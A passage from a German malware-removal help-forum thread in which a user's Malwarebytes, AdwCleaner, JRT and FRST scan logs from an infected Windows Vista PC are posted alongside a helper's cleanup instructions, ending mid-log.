[5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:23:31, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:23:34, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:23:52, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:23:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:23:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:24:03, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:24:08, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:24:18, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:24:23, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, IP, 88.214.193.211, 52561, Outbound, C:\Windows\explorer.exe, Detection, 06.12.2014 09:24:56, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:24:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:25:32, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Protection, 06.12.2014 09:25:44, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopping, Protection, 06.12.2014 09:25:44, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopped, Protection, 06.12.2014 09:25:44, SYSTEM, FINJA-PC, Protection, Malware Protection, Stopping, Protection, 06.12.2014 09:25:44, SYSTEM, FINJA-PC, Protection, Malware Protection, Stopped, Protection, 06.12.2014 10:25:22, SYSTEM, FINJA-PC, Protection, Malware Protection, Starting, Protection, 06.12.2014 10:25:22, SYSTEM, FINJA-PC, Protection, Malware Protection, Started, (end) |
|
06.12.2014, 15:17
| #2 |
 | Trojan.FakeMS.ED in dll-Datei Schritt 1
__________________Downloade Dir bitte  AdwCleaner auf deinen Desktop.
Schritt 2 Downloade Dir bitte  Malwarebytes Anti-Malware
Schritt 3 Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Schritt 4 Bitte starte  FRST erneut, setze den Haken auch bei Addition.txt und drücke auf Scan.Bitte poste mir die Inhalte der Logs von Adwarecleaner, MBAM, JRT und FRST hier in den Thread.
__________________ |
|
06.12.2014, 16:38
| #3 |
| | Trojan.FakeMS.ED in dll-Datei Danke für die Antwort. Hier die Logs:
__________________AdwCleaner: Code:
ATTFilter # AdwCleaner v4.104 - Bericht erstellt am 06/12/2014 um 15:37:24
# Aktualisiert 05/12/2014 von Xplode
# Database : 2014-12-03.1 [Live]
# Betriebssystem : Windows Vista (TM) Home Premium Service Pack 2 (32 bits)
# Benutzername : finja - FINJA-PC
# Gestartet von : C:\Users\finja\Desktop\AdwCleaner_4.104.exe
# Option : Löschen
***** [ Dienste ] *****
***** [ Dateien / Ordner ] *****
***** [ Tasks ] *****
***** [ Verknüpfungen ] *****
***** [ Registrierungsdatenbank ] *****
***** [ Browser ] *****
-\\ Internet Explorer v9.0.8112.16592
-\\ Mozilla Firefox v
*************************
AdwCleaner[R0].txt - [33470 octets] - [13/11/2014 13:15:26]
AdwCleaner[R1].txt - [1181 octets] - [13/11/2014 13:24:49]
AdwCleaner[R2].txt - [1250 octets] - [27/11/2014 21:14:54]
AdwCleaner[R3].txt - [2473 octets] - [05/12/2014 21:07:25]
AdwCleaner[R4].txt - [1195 octets] - [06/12/2014 15:35:34]
AdwCleaner[S0].txt - [32229 octets] - [13/11/2014 13:17:56]
AdwCleaner[S1].txt - [1311 octets] - [27/11/2014 21:18:12]
AdwCleaner[S2].txt - [2538 octets] - [05/12/2014 21:09:29]
AdwCleaner[S3].txt - [1117 octets] - [06/12/2014 15:37:24]
########## EOF - C:\AdwCleaner\AdwCleaner[S3].txt - [1177 octets] ##########
Code:
ATTFilter Malwarebytes Anti-Malware www.malwarebytes.org Suchlauf Datum: 06.12.2014 Suchlauf-Zeit: 15:44:20 Logdatei: mbam.txt Administrator: Ja Version: 2.00.4.1028 Malware Datenbank: v2014.12.06.05 Rootkit Datenbank: v2014.12.03.01 Lizenz: Testversion Malware Schutz: Aktiviert Bösartiger Webseiten Schutz: Aktiviert Selbstschutz: Deaktiviert Betriebssystem: Windows Vista Service Pack 2 CPU: x86 Dateisystem: NTFS Benutzer: finja Suchlauf-Art: Bedrohungs-Suchlauf Ergebnis: Abgeschlossen Durchsuchte Objekte: 294475 Verstrichene Zeit: 23 Min, 29 Sek Speicher: Aktiviert Autostart: Aktiviert Dateisystem: Aktiviert Archive: Aktiviert Rootkits: Deaktiviert Heuristik: Aktiviert PUP: Aktiviert PUM: Aktiviert Prozesse: 1 Trojan.Clicker, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe, 3260, Löschen bei Neustart, [336ac09f7a02d36315aa17d5c63bc33d] Module: 0 (Keine schädliche Elemente erkannt) Registrierungsschlüssel: 0 (Keine schädliche Elemente erkannt) Registrierungswerte: 0 (Keine schädliche Elemente erkannt) Registrierungsdaten: 0 (Keine schädliche Elemente erkannt) Ordner: 0 (Keine schädliche Elemente erkannt) Dateien: 1 Trojan.Clicker, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe, Löschen bei Neustart, [336ac09f7a02d36315aa17d5c63bc33d], Physische Sektoren: 0 (Keine schädliche Elemente erkannt) (end) Code:
ATTFilter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.0 (11.29.2014:1)
OS: Windows Vista (TM) Home Premium x86
Ran by finja on 06.12.2014 at 16:15:07,90
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~ Services
~~~ Registry Values
~~~ Registry Keys
~~~ Files
~~~ Folders
~~~ Event Viewer Logs were cleared
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 06.12.2014 at 16:21:52,77
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
FRST Logfile: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 03-12-2014 Ran by finja (administrator) on FINJA-PC on 06-12-2014 16:31:24 Running from C:\Users\finja\Desktop Loaded Profile: finja (Available profiles: finja) Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: Deutsch (Deutschland) Internet Explorer Version 9 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe (Microsoft Corporation) C:\Windows\System32\SLsvc.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe (InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe (Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbam.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE (Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe (Intel Corporation) C:\Windows\System32\igfxsrvc.exe (Dritek System Inc.) C:\Program Files\Launch Manager\LManager.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe (Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe (Microsoft Corporation) C:\Windows\ehome\ehtray.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe (Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe (1und1 Mail und Media GmbH) C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe (Microsoft Corporation) C:\Windows\ehome\ehmsas.exe (Intel Corporation) C:\Windows\System32\igfxext.exe (Microsoft Corporation) C:\Windows\System32\conime.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Corporation) HKLM\...\Run: [LManager] => C:\Program Files\Launch Manager\LManager.exe [768520 2008-07-25] (Dritek System Inc.) HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [159744 2007-07-21] (Alps Electric Co., Ltd.) HKLM\...\Run: [WarReg_PopUp] => C:\Program Files\eMachines\WR_PopUp\WarReg_PopUp.exe [49152 2008-05-09] (eMachines) HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation) HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated) HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation) HKLM\...\Run: [eRecoveryService] => [X] HKLM\...\Run: [MailCheck IE Broker] => C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe [2135104 2014-11-17] (1und1 Mail und Media GmbH) HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0 HKLM\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Corporation) HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [TaskbarNoNotification] 0 HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a GroupPolicy: Group Policy on Chrome detected <======= ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION ProxyServer: [.DEFAULT] => http=127.0.0.1:53278;https=127.0.0.1:53278 HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://suche.web.de/webhp?src=br_startpage_ie StartMenuInternet: IEXPLORE.EXE - iexplore.exe SearchScopes: HKLM -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = SearchScopes: HKLM -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW SearchScopes: HKU\.DEFAULT -> {31BB071C-45F4-4DAD-BF5E-AD495B3B2FC8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> DefaultScope {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation) BHO: WEB.DE MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH) Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {FA23121F-EE7C-4BD8-8C06-123D087282C5} - No File Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {F2413FFA-9DCC-48B3-A09A-625F44D7FA96} - No File DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation) Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation) Handler: webde - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH) Tcpip\Parameters: [DhcpNameServer] 192.168.179.1 FireFox: ======== FF ProfilePath: C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default FF NetworkProxy: "http", "127.0.0.1" FF NetworkProxy: "http_port", 38159 FF NetworkProxy: "no_proxies_on", "localho,t,127.0.0.1,*origin.com,*ea.com,*akamaihd.net" FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.) FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-717213786-2690546565-922636609-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll No File FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\webssearches.xml FF Extension: 06997db0c0274d5fbd37b0d9230226ea - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{06997db0-c027-4d5f-bd37-b0d9230226ea} [2014-11-06] FF Extension: Microsoft .NET Framework Assistant - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2014-11-04] FF Extension: PriceFountain - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{b6a94784-0ffb-4121-88c6-435139067ee2}.xpi [2014-11-06] FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-16] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found] FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found] FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found] FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found] FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] FF Extension: No Name - tylerkeith11@aol.com [Not Found] FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found] FF StartMenuInternet: FIREFOX.EXE - firefox.exe Chrome: ======= CHR StartMenuInternet: Google Chrome - chrome.exe ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ETService; C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe [24576 2008-06-11] () [File not signed] R2 LightScribeService; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [61440 2007-01-17] (Hewlett-Packard Company) [File not signed] R2 MBAMScheduler; C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation) R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation) R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed] R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation) R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed] S2 compilerehtraceProt.exe; C:\Users\finja\AppData\Local\compilerehtraceProt\compilerehtraceProt.exe [X] S2 evrtspkgBckp.exe; C:\Users\finja\AppData\Local\evrtspkgBckp\evrtspkgBckp.exe [X] S2 FrozenGNUThumbnail.exe; C:\Users\finja\AppData\Local\FrozenGNUThumbnail\FrozenGNUThumbnail.exe [X] S2 FrozenSambaWindows.exe; C:\Users\finja\AppData\Local\FrozenSambaWindows\FrozenSambaWindows.exe [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R1 DritekPortIO; C:\Program Files\Launch Manager\DPortIO.sys [20112 2006-11-02] (Dritek System Inc.) S3 grmnusb; C:\Windows\System32\drivers\grmnusb.sys [15720 2012-04-18] (GARMIN Corp.) S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [35992 2014-12-05] () R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-11-21] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-12-06] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-11-21] (Malwarebytes Corporation) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation) S3 USB_RNDIS; C:\Windows\System32\DRIVERS\usb8023.sys [15872 2013-02-12] (Microsoft Corporation) S3 BS2521310881; \??\C:\Users\finja\AppData\Local\Temp\NTFS.sys [X] S3 IntcAzAudAddService; system32\drivers\RTKVHDA.sys [X] S3 IpInIp; system32\DRIVERS\ipinip.sys [X] S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X] S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-06 16:21 - 2014-12-06 16:21 - 00000634 _____ () C:\Users\finja\Desktop\JRT.txt 2014-12-06 15:41 - 2014-12-06 15:41 - 00001257 _____ () C:\Users\finja\Desktop\AdwCleaner[S3].txt 2014-12-06 15:36 - 2014-12-06 15:36 - 01707646 _____ (Thisisu) C:\Users\finja\Desktop\JRT.exe 2014-12-06 15:35 - 2014-12-06 15:35 - 02153472 _____ () C:\Users\finja\Desktop\AdwCleaner_4.104.exe 2014-12-06 10:28 - 2014-12-06 16:14 - 00001435 _____ () C:\Users\finja\Desktop\mbam.txt 2014-12-06 10:23 - 2014-12-06 10:24 - 00018716 _____ () C:\Users\finja\Desktop\gmer.txt 2014-12-06 09:22 - 2014-12-06 09:23 - 00028694 _____ () C:\Users\finja\Desktop\Addition.txt 2014-12-06 09:22 - 2014-12-06 09:22 - 00380416 _____ () C:\Users\finja\Desktop\v5shw8ku.exe 2014-12-06 09:20 - 2014-12-06 16:31 - 00015281 _____ () C:\Users\finja\Desktop\FRST.txt 2014-12-06 09:20 - 2014-12-06 16:31 - 00000000 ____D () C:\FRST 2014-12-06 09:19 - 2014-12-06 09:19 - 01110016 _____ (Farbar) C:\Users\finja\Desktop\FRST.exe 2014-12-06 09:18 - 2014-12-06 09:18 - 00000472 _____ () C:\Users\finja\Desktop\defogger_disable.log 2014-12-06 09:18 - 2014-12-06 09:18 - 00000000 _____ () C:\Users\finja\defogger_reenable 2014-12-06 09:17 - 2014-12-06 09:17 - 00050477 _____ () C:\Users\finja\Desktop\Defogger.exe 2014-12-06 08:40 - 2014-12-06 08:50 - 00003570 _____ () C:\Users\finja\Desktop\Rkill.txt 2014-12-06 08:39 - 2014-12-06 08:39 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\finja\Downloads\rkill.exe 2014-12-05 21:51 - 2014-12-06 16:19 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-12-05 21:51 - 2014-12-05 21:53 - 00000901 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\Program Files\ Malwarebytes Anti-Malware 2014-12-05 21:50 - 2014-11-21 06:14 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-12-05 21:50 - 2014-11-21 06:14 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-12-05 21:50 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-12-05 21:07 - 2014-12-06 15:35 - 00000110 _____ () C:\AdwCleanerDebug.txt 2014-12-05 21:04 - 2014-12-05 21:04 - 00000000 ____D () C:\TDSSKiller_Quarantine 2014-12-05 20:49 - 2014-12-05 20:49 - 00035992 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys 2014-12-05 20:32 - 2014-12-05 20:32 - 00011842 _____ () C:\Windows\system32\.crusader 2014-12-05 20:01 - 2014-12-05 20:32 - 00000000 ____D () C:\Users\finja\AppData\Local\gnuutilityUI 2014-12-05 20:01 - 2014-12-05 20:02 - 00000000 ____D () C:\Windows\system32\guicca32 2014-12-05 19:40 - 2014-12-05 19:40 - 263670483 _____ () C:\Windows\MEMORY.DMP 2014-12-05 19:40 - 2014-12-05 19:40 - 00145784 _____ () C:\Windows\Minidump\Mini120514-01.dmp 2014-12-05 19:39 - 2014-12-05 19:39 - 00000000 ____D () C:\Temp 2014-12-05 13:33 - 2014-12-05 20:08 - 00000000 ____D () C:\ProgramData\HitmanPro 2014-12-04 20:43 - 2014-12-04 20:43 - 00000000 ____D () C:\Users\finja\AppData\Local\Microsoft Corporation 2014-12-03 19:45 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\ZorkoKcesd 2014-12-02 19:37 - 2014-12-02 19:37 - 00000000 ____D () C:\Windows\system32\utilitylocalspl_86 2014-12-02 19:34 - 2014-12-02 19:34 - 00000000 ____D () C:\Windows\system32\scrollingwin32Prot 2014-12-01 11:06 - 2014-12-06 15:37 - 00000000 ___HD () C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A} 2014-12-01 11:06 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\EedtaWbezm 2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WEB.DE MailCheck 2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\Program Files\WEB.DE MailCheck 2014-11-28 20:51 - 2014-11-28 20:51 - 00000000 ____D () C:\ProgramData\UUdb 2014-11-27 22:42 - 2014-11-27 22:42 - 00000000 ____D () C:\Program 